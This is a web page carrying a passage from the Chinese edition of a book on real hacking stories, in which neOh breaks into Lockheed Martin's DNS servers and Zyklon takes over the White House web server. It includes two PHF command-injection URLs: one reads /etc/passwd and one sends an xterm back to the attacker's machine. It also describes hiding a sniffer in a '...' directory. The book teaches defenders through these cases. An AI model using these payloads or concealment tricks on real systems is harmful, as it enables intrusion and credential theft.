频道栏目
读书频道 > 安全 > 反入侵的艺术——黑客入侵背后的真实故事
2.6 启示
2014-08-22 15:29:00     我来说两句
收藏   我要投稿
本书中有些故事令人震惊,有些故事开阔视野,有些故事使你为黑客的灵感而发笑。如果你是一位IT或安全专业人士,就能从每个故事中吸取教训以帮助你的公司加固安全。如果你并非技术人员,而只是对有关犯罪、胆大、  立即去当当网订购

neOh向我们描述了他入侵Lockheed Martin计算机系统的详细经过。这个故事既是黑客洗心革面的誓词(过去他们的格言是“如果有漏洞,我们就会发起攻击”),对每个组织而言,又是一次警示。

他很快发现Lockheed使用的是自己的域名服务器(DNS)。DNS,就是一种Internet协议,比如将www.disney.com 翻译成198.187.189.55,翻译后的地址可用来路由消息包。neOh知道,波兰的一个安全研究组织已将一个黑客称为exploit的方式公布出来了—— 那是为攻击某个漏洞而特意编写的一个程序—— 他就可以利用这个程序来攻击Lockheed运行的DNS了。

这家公司使用的是DNS协议的一个执行程序BIND(Berkeley Internet Name Domain)。这个波兰组织发现BIND有一个版本特别容易遭受涉及远程缓冲器溢出的攻击,而Lockheed使用的正是这个版本。按照自己在网上搜索到的方法,neOh能够在主DNS服务器和次级DNS服务器上获得根用户权限。

获得根用户权限后,neOh通过安装一个嗅探器—— 就像一个计算机上的窃听装置—— 就开始拦截口令和电子邮件了。任何通过线路的通信都被偷偷地捕获了;黑客通常将捕获的信息存放在一个不易被察觉的地方。为隐藏自己的嗅探器,neOh说,他创建了一个目录,上面的名字仅代表一个空间,用三个点来表示;他实际使用的路径是“/var/adm/…”,如果仅是简单的检查,系统管理员通常会忽略这个不起眼的条目。

这种隐藏嗅探程序使用的技术非常简单,虽然它在很多情况下都发挥了作用。更复杂的掩盖黑客踪迹的技术一般在这种场合下使用。

在找出自己能否进一步渗透Lockheedd Martin以及获得该公司的机密信息之前,neOh将自己的注意力集中到另一项任务上面去了。这时,Lockheed Martin的敏感文件还是安全的。

Zyklon说,为了攻击白宫网站,他一开始就安装了公共网关接口(Common Gateway Interface,CGI)扫描器的程序,可用它来扫描目标系统,从而找出CGI的漏洞。他发现使用PHF exploit,网站很容易遭受攻击,因为可以利用开发PHF脚本的程序员的错误。

PHF是一种基于表单的界面,它接受姓名作为输入,然后在服务器上查找这个姓名及其地址。这个脚本调用escape_shell_cmd()函数,用来对输入项中的所有特殊字符进行合法检测。但程序设计者在他的列表中遗漏了一个字符—— 换行字符。富有见识的黑客能够利用这个疏漏,通过输入一串包含换行字符的字符串,就能欺骗脚本去执行任何他们想要执行的命令了。

Zyklon在浏览器里输入了一个URL:
http://www.whitehouse.gov/cgi-bin/phf?Qalisa=x%0a/ bin/cat%20/ect/passwd
用这个,他就能将白宫政府网站的口令文件显示出来。但他想完全控制白宫网站服务器。他知道这些X服务器的端口很可能被防火墙阻断了,他将不能连接到白宫政府网站的任何服务。所以,他没有使用那种方法,而是再次利用这个PHF漏洞,输入这个地址:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/ usr/X11R6/bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0

这样就使白宫服务器的X终端仿真(xterm)发送到了处于他控制下的运行X服务器的计算机上。这就意味着,他不必自己去连接白宫政府网站,事实上,他已经在命令白宫的网站系统来主动连接他了(这只有当防火墙允许对外连接时,才有可能发生。而故事中显然正是这种情况)。

然后他利用了系统程序中的一个缓冲器溢出漏洞—— ufsrestore。Zyklon说,这使他能以根用户方式访问白宫政府网站,以及白宫的邮件服务器和网络上的其他系统。

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:2.5.6 到底有多刺激
下一篇:2.7 对策
相关文章
图文推荐
排行
热门
最新书评
特别推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站